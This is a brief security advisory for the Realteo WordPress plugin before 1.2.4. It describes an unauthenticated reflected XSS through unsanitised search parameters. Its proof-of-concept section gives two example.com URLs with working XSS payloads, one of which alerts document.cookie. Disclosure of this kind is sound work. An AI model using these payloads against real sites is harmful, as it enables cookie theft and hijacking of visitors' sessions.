Realteo < 1.2.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page, leading to an unauthenticated reflected Cross-Site Scripting issue.

Proof of Concept

https://example.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);//%22



https://example.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22&search_radius=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22